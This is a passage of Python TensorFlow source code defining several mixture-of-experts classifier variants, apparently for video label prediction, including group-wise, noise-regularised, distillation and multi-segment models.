l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.encoder_size
hidden_channels = FLAGS.hidden_channels
shape = model_input.get_shape().as_list()[1]
class_input = slim.fully_connected(
model_input,
shape,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1,class_size, num_mixtures])) # Batch x class_size x num_mixtures
class_expert_distribution = tf.reshape(class_expert_distribution,[-1,num_mixtures])
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
"""
class_expert_activations = slim.fully_connected(
class_input,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
probabilities_by_class = slim.fully_connected(
class_expert_activations,
class_size,
activation_fn=tf.nn.softmax,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="probabilities_by_class")"""
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
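# The decoder weights come from a pretrained autoencoder stored as a plain-text
# matrix; by assumption the last row is the bias and the remaining rows are the
# weight matrix, matching what np.savetxt would have produced.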
encoder_vars = np.loadtxt(FLAGS.autoencoder_dir+'autoencoder_layer%d.model' % FLAGS.encoder_layers)
weights = tf.constant(encoder_vars[:-1,:],dtype=tf.float32)
bias = tf.reshape(tf.constant(encoder_vars[-1,:],dtype=tf.float32),[-1])
class_output = tf.nn.relu(tf.nn.xw_plus_b(probabilities_by_class,weights,bias))
class_output = tf.nn.l2_normalize(class_output,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input, class_output), axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
"""
final_probabilities = tf.reshape(probabilities_by_class,[-1,class_size*hidden_channels])
for i in range(FLAGS.encoder_layers, FLAGS.encoder_layers*2):
var_i = np.loadtxt(FLAGS.autoencoder_dir+'autoencoder_layer%d.model' % i)
weight_i = tf.constant(var_i[:-1,:],dtype=tf.float32)
bias_i = tf.reshape(tf.constant(var_i[-1,:],dtype=tf.float32),[-1])
final_probabilities = tf.nn.xw_plus_b(final_probabilities,weight_i,bias_i)
if i<FLAGS.encoder_layers*2-1:
final_probabilities = tf.nn.relu(final_probabilities)
else:
final_probabilities = tf.nn.sigmoid(final_probabilities)"""
return {"predictions": final_probabilities, "predictions_encoder": probabilities_by_class}
class MoeMix3Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.encoder_size
hidden_channels = FLAGS.hidden_channels
shape = model_input.get_shape().as_list()[1]
class_input = slim.fully_connected(
model_input,
shape,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.reshape(class_expert_activations,[-1,num_mixtures])
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
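# Unlike MoeMix2Model, the experts here are left as raw activations (no
# sigmoid); the mixture output is standardized per example, layer-norm style,
# then passed through a ReLU and the fixed pretrained decoder layer.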
hidden_mean = tf.reduce_mean(probabilities_by_class,axis=1,keep_dims=True)
hidden_std = tf.sqrt(tf.reduce_mean(tf.square(probabilities_by_class-hidden_mean),axis=1,keep_dims=True))
probabilities_by_class = (probabilities_by_class-hidden_mean)/(hidden_std+1e-6)
hidden_2 = tf.nn.relu(probabilities_by_class)
encoder_vars = np.loadtxt(FLAGS.autoencoder_dir+'autoencoder_layer%d.model' % FLAGS.encoder_layers)
weights = tf.constant(encoder_vars[:-1,:],dtype=tf.float32)
bias = tf.reshape(tf.constant(encoder_vars[-1,:],dtype=tf.float32),[-1])
class_output = tf.nn.relu(tf.nn.xw_plus_b(hidden_2,weights,bias))
#class_output = probabilities_by_class
class_output = tf.nn.l2_normalize(class_output,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input, class_output), axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_encoder": probabilities_by_class}
class MoeMix4Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
if FLAGS.moe_group:
channels = vocab_size//class_size + 1
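# Group mode: the vocabulary is split into `channels` consecutive groups of
# class_size labels, with the remainder in the last group. Note this assumes
# vocab_size is not an exact multiple of class_size; otherwise the last group
# would be empty.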
vocab_input = model_input
probabilities_by_class = []
for i in range(channels):
if i<channels-1:
sub_vocab_size = class_size
else:
sub_vocab_size = vocab_size - (channels-1)*class_size
gate_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, sub_vocab_size])
if i==0:
probabilities_by_class = probabilities_by_vocab
else:
probabilities_by_class = tf.concat((probabilities_by_class, probabilities_by_vocab),axis=1)
#probabilities_by_features = tf.stop_gradient(probabilities_by_class)
probabilities_by_features = probabilities_by_class
class_input_1 = slim.fully_connected(
probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class1-%s" % i)
class_input_2 = slim.fully_connected(
1-probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class2-%s" % i)
if not FLAGS.frame_features:
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input,class_input_1,class_input_2),axis=1)
"""
class_input_1 = slim.fully_connected(
probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class1-%s" % i)
if not FLAGS.frame_features:
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input,class_input_1),axis=1)"""
else:
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_2 = slim.fully_connected(
1-probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs2-%s" % i)
if not FLAGS.frame_features:
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input_1,class_input_2),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeNoiseModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
if FLAGS.train=="train":
noise = tf.random_normal(shape=tf.shape(model_input), mean=0.0, stddev=FLAGS.noise_std, dtype=tf.float32)
model_input = tf.nn.l2_normalize(model_input+noise, 1)
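# Denoising-style regularization: during training the l2-normalized input is
# perturbed with Gaussian noise of stddev FLAGS.noise_std; the same trick is
# applied to the chained class features further down (with stddev 0.2).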
if FLAGS.moe_group:
channels = vocab_size//class_size + 1
vocab_input = model_input
probabilities_by_class = []
for i in range(channels):
if i<channels-1:
sub_vocab_size = class_size
else:
sub_vocab_size = vocab_size - (channels-1)*class_size
gate_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, sub_vocab_size])
if i==0:
probabilities_by_class = probabilities_by_vocab
else:
probabilities_by_class = tf.concat((probabilities_by_class, probabilities_by_vocab),axis=1)
#probabilities_by_features = tf.stop_gradient(probabilities_by_class)
probabilities_by_features = probabilities_by_class
class_input = slim.fully_connected(
probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class-%s" % i)
class_input = tf.nn.l2_normalize(class_input,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input,class_input),axis=1)
else:
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs-%s" % i)
if FLAGS.train=="train":
noise = tf.random_normal(shape=tf.shape(class_input), mean=0.0, stddev=0.2, dtype=tf.float32)
class_input = tf.nn.l2_normalize(class_input+noise, 1)
class_input = tf.nn.l2_normalize(class_input,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMix5Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
feature_sizes = FLAGS.feature_sizes
feature_sizes = [int(feature_size) for feature_size in feature_sizes.split(',')]
feature_input = model_input[:,0:feature_sizes[0]]
probabilities_by_class = model_input[:,feature_sizes[0]:]
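# model_input is assumed to be a concatenation of raw features (the first
# feature_sizes[0] columns) and precomputed predictions from an earlier model;
# the predictions are re-embedded and fed back alongside the raw features.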
class_input = slim.fully_connected(
probabilities_by_class,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.nn.l2_normalize(class_input,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((feature_input,class_input),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities}
class MoeExtendModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
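# Extend mode: the batch carries num_extends feature rows per example (e.g. one
# per video segment); predictions are computed per row and max-pooled over the
# rows at the end.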
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
final_probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_max(tf.reshape(final_probabilities_by_class_and_batch,
[-1, num_extends, vocab_size]), axis=1)
return {"predictions": final_probabilities}
class MoeExtendDistillChainModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
class_size = 256
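# Distillation chain: when teacher predictions are provided, they are embedded
# into a 256-dim vector, tiled across the num_extends rows of each example, and
# concatenated to the per-row features.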
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.reshape(tf.tile(tf.reshape(class_input,[-1,1,class_size]),[1,num_extends,1]),[-1,class_size])
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
final_probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_max(tf.reshape(final_probabilities_by_class_and_batch,
[-1, num_extends, vocab_size]), axis=1)
return {"predictions": final_probabilities}
class MoeExtendCombineModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
num_extends = FLAGS.moe_num_extend
shape = model_input.get_shape().as_list()[1]
model_input = tf.reshape(model_input,[-1, num_extends, shape])
model_input_0 = model_input[:,0,:]
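# Segment 0 seeds the chain; each subsequent layer sees its own segment plus an
# embedding of every earlier layer's predictions (accumulated in input_layers).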
gate_activations = slim.fully_connected(
model_input_0,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input_0,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
input_layers = []
for i in range(FLAGS.moe_layers-1):
model_input_i = model_input[:,i+1,:]
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
input_layers.append(class_input_1)
vocab_input = tf.concat([model_input_i]+input_layers,axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeExtendSoftmaxModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
